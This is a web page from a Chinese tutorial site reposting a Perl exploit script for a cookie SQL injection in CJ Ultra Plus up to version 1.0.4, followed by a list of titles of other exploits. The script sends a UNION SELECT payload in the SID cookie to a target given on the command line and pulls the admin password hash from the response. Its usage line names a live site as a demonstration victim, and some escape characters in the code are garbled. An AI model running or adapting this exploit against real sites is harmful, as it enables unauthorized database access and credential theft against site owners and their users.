手机
当前位置:查字典教程网 >网络安全 >Exploit >CJ Ultra Plus
CJ Ultra Plus
摘要:#!/usr/bin/perl##CJUltraPlus>>GretzZz2:pronoobz.org-Wesker,ChinaSunand...

#!/usr/bin/perl

#

# CJ Ultra Plus <= v1.0.4 Cookie SQL Injection

#

# found and coded by -SmoG- /GermAn hAckZ0r

# contact: ICQ - 266836394

#

#

#

#

# hints: - sometimes the parameter "SID" is different to the normal one...

# - i extract the hash from the html-code... but i was 2 lazy for coding a good working filter

# - salted DES (normaly "aa" will be the salt, but it can be different)

# - ive spend about 1 hour for this source... its my first exploit in perl... so plz be friendly with ur feedback...

#

#

# >>> GretzZz 2: pronoobz.org - Wesker, China Sun and all other memberZz <<<

use LWP::UserAgent;

if ($#ARGV 1 !=1) {

print "n### CJ Ultra Plus <= v1.0.4 Cookie SQL Injection Exploit###n";

print "found and coded by -SmoG-n";

print "nnUsage: perl xploit.pl -victimn";

print " perl xploit.pl http://gayxboy.com/nn"; #LiVe-Dem0! letZz pwnz the pedophile!!

exit();

}

print "n### CJ Ultra Plus <= v1.0.4 Cookie SQL Injection Exploit###n";

print "nstarting exploit...";

$target=$ARGV[0];

chomp($target);

if($target !~ /^http:///)

{

$target = "http://".$target;

}

if($target !~ //$/)

{

$target .= "/";

}

@header = ('Cookie' => "SID='UNION SELECT b12 from settings/*");

$ua = LWP::UserAgent->new;

$ua->timeout(10);

$ua->env_proxy;

$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");

$response = $ua->get($target, @header);

if ($response->is_success)

{

$temp = $response->content;

if ($temp =~/(.*)SID=(.*);/)

{

$result=substr($temp,85,13);

print "nadminhash: "; print $result;

}

}

else

{

die "Error: ".$response->status_line;

}

【CJ Ultra Plus】相关文章:

Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit

Dreampics Builder (page) Remote SQL Injection Vulnerability

Dana IRC 1.4a Remote Buffer Overflow Exploit

WFTPD Pro Server

fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (php)

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC

Download Accelerator Plus - DAP 8.x (m3u) Local BOF Exploit 0day

Maian Events 2.0 Insecure Cookie Handling Vulnerability

MS Internet Explorer Recordset Double Free Memory Exploit

ESET Smart Security 3.0.667.0 Privilege Escalation PoC

精品推荐
分类导航